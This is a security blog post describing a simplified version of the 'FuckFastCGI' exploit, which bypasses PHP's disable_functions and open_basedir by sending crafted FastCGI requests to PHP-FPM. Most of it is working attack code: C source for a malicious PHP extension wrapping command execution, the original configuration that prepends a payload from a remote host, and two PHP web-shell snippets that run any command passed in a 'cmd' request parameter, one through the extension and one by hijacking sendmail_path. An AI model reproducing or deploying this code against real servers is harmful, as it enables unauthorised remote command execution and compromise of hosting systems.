FuckFastCGI made simpler

stuff

Let’s render unto Caesar the things that are Caesar’s, the exploit FuckFastCGI is not mine and is a brilliant one, bypassing open_basedir and disable_functions by the means of external malicious library loading.

While open_basedir can be modified at runtime and turned into open_basedir = /, it is not the same regarding disable_functions. The latter can only be set in the main php.ini and cannot be overriden by a local configuration or programmatically through ini_set or ini_alter.

To bypass this measure, the exploit sets two other configuration values: extension and extension_dir. By loading an external library which itself calls the C system function, disabled PHP functions are no more a protection.

The C code is as follows (the word TSRMLS_CC is commented to make it work with PHP >= 8.0. Uncomment if older):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <php.h>
#include "hello.h"

zend_function_entry hello_functions[] = {
    PHP_FE(hello_world, NULL)
    PHP_FE_END
};

zend_module_entry hello_module_entry = {
    STANDARD_MODULE_HEADER,
    PHP_HELLO_EXTNAME,
    hello_functions,
    NULL,
    NULL,
    NULL,
    NULL,
    NULL,
    PHP_HELLO_VERSION,
    STANDARD_MODULE_PROPERTIES,
};

ZEND_GET_MODULE(hello);

PHP_FUNCTION(hello_world) {
    int ret, mode = 1;
    size_t s_len;
    char *s;
    zend_parse_parameters(ZEND_NUM_ARGS() /*TSRMLS_CC*/, "s", &s, &s_len);
    ret = php_exec(mode, s, NULL, return_value);
};

This program creates a routine named hello_world which is nothing more than a wrapper for system, and makes it available to PHP, as soon as the extension is loaded.

In the original exploit, the following values had to be set:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// your extension directory path
$ext_dir_path = '/var/www/app/ext/';

// your extension name
$ext_name = 'hello.so';

// unix socket path or tcp host
$connect_path = 'unix:///var/run/php/php7.2-fpm.sock';

// tcp connection port (unix socket: -1)
$port = -1;

// Don't use this exploit file itself
$filepath = '/var/www/app/index.php';

// your php payload location
$prepend_file_path = 'http://kaibro.tw/gginin2';

The principle was to add a dummy index.php somewhere on the disk, and to use the directive auto_prepend_file to prepend the true payload, which was in turn calling hello_world. Problem: executing a different shell command requires a new payload file (in the example, it is a remote payload on a different host. It is made possible thanks to a modification of allow_url_include).

Actually, tweaking a little bit the exploit and adapting it based on the code from here, and we can reduce it to only one PHP and one SO file. Also, the socket path should be updated according to the type of listener:

1
2
3
$client = new FCGIClient("127.0.0.1:9000", -1); // or custom ip:port
//or
$client = new FCGIClient("unix:///var/run/php/php-fpm.sock", -1); //should be a symlink to the real socket file

The last part of the script changes, to avoid the need to modify the payload and to repush a file on the disk:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
if (isset($_REQUEST['cmd'])) {
    // ---- BEGIN CONFIG
    $ext_dir_path = '/tmp';
    $ext_name = 'hello.so';
    // ---- END CONFIG

    $req = '/'.basename(__FILE__);
    $uri = $req .'?'.'command='.$_REQUEST['cmd'];
    $client = new FCGIClient("127.0.0.1:9000", -1);
    //$client = new FCGIClient("unix:///var/run/php/php-fpm.sock", -1);
    $code = "<?php echo '\$\$';hello_world(\$_REQUEST['command']);?>";
    $php_value = "allow_url_include = On\nopen_basedir = /\nauto_prepend_file = php://input";
    $php_admin_value = "extension_dir=" . $ext_dir_path . "\nextension=" . $ext_name;
    $params = array(
        'GATEWAY_INTERFACE' => 'FastCGI/1.0',
        'REQUEST_METHOD'    => 'POST',
        'SCRIPT_FILENAME'   => __FILE__,
        'SCRIPT_NAME'       => $req,
        'QUERY_STRING'      => 'command='.$_REQUEST['cmd'],
        'REQUEST_URI'       => $uri,
        'DOCUMENT_URI'      => $req,
        'PHP_VALUE'         => $php_value,
        'PHP_ADMIN_VALUE'   => $php_admin_value,
        'SERVER_SOFTWARE'   => 'kaibro-fastcgi-rce',
        'REMOTE_ADDR'       => '127.0.0.1',
        'REMOTE_PORT'       => '9985',
        'SERVER_ADDR'       => '127.0.0.1',
        'SERVER_PORT'       => '80',
        'SERVER_NAME'       => 'localhost',
        'SERVER_PROTOCOL'   => 'HTTP/1.1',
        'CONTENT_LENGTH'    => strlen($code)
        );
    try{
        $resp = $client->request($params, $code);
        $idx = strpos($resp, '$$');
        if ($idx !== false){
            echo substr($resp, $idx+2);
        }
    }
    catch(Exception $e){
        echo "If you used the param cmd and it didn't print anything, please try to refresh";
    }
    if (function_exists("shell_exec")){
        echo shell_exec("date");
    }
    else{
        echo "Nope, shell_exec is disabled";
    }
    phpinfo();
}

Instead of loading an external payload, the latter is passed as a stream (php://input). The GET argument containing the command is forwarded, and passed to hello_world.

As shown below, the command id can be executed, although the routines are still marked as disabled.

php_exec1.png

php_exec2.png

Keep it simple, stupid

Well, there is even easier … We could simply modify the configuration file related to the MTA, and replace it with our own command:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
if (isset($_REQUEST['cmd'])) {
    $cmd = $_REQUEST['cmd'];
    $req = '/'.basename(__FILE__);
    //$client = new FCGIClient("127.0.0.1:9000", -1);
    $client = new FCGIClient("unix:///var/run/php/php-fpm.sock", -1);
    $code = "<?php mail('', '', ''); \$content = file_get_contents('/tmp/out'); if (\$content) echo '\$\$'.\$content; ?>";
    $php_value = "allow_url_include = On\nopen_basedir = /\nauto_prepend_file = php://input";
    $php_admin_value = "sendmail_path=$cmd > /tmp/out";
    $params = array(
        'GATEWAY_INTERFACE' => 'FastCGI/1.0',
        'REQUEST_METHOD'    => 'POST',
        'SCRIPT_FILENAME'   => __FILE__,
        'SCRIPT_NAME'       => $req,
        'QUERY_STRING'      => "",
        'REQUEST_URI'       => $req,
        'DOCUMENT_URI'      => $req,
        'PHP_VALUE'         => $php_value,
        'PHP_ADMIN_VALUE'   => $php_admin_value,
        'SERVER_SOFTWARE'   => '80sec/wofeiwo',
        'REMOTE_ADDR'       => '127.0.0.1',
        'REMOTE_PORT'       => '9985',
        'SERVER_ADDR'       => '127.0.0.1',
        'SERVER_PORT'       => '80',
        'SERVER_NAME'       => 'localhost',
        'SERVER_PROTOCOL'   => 'HTTP/1.1',
        'CONTENT_LENGTH'    => strlen($code)
        );
    $resp = $client->request($params, $code);
    $idx = strpos($resp, '$$');
    if ($idx !== false){
        echo substr($resp, $idx+2);
    }
    die();
}

Exploit code (original): https://github.com/w181496/FuckFastcgi
Exploit code (fork): https://github.com/BorelEnzo/FuckFastcgi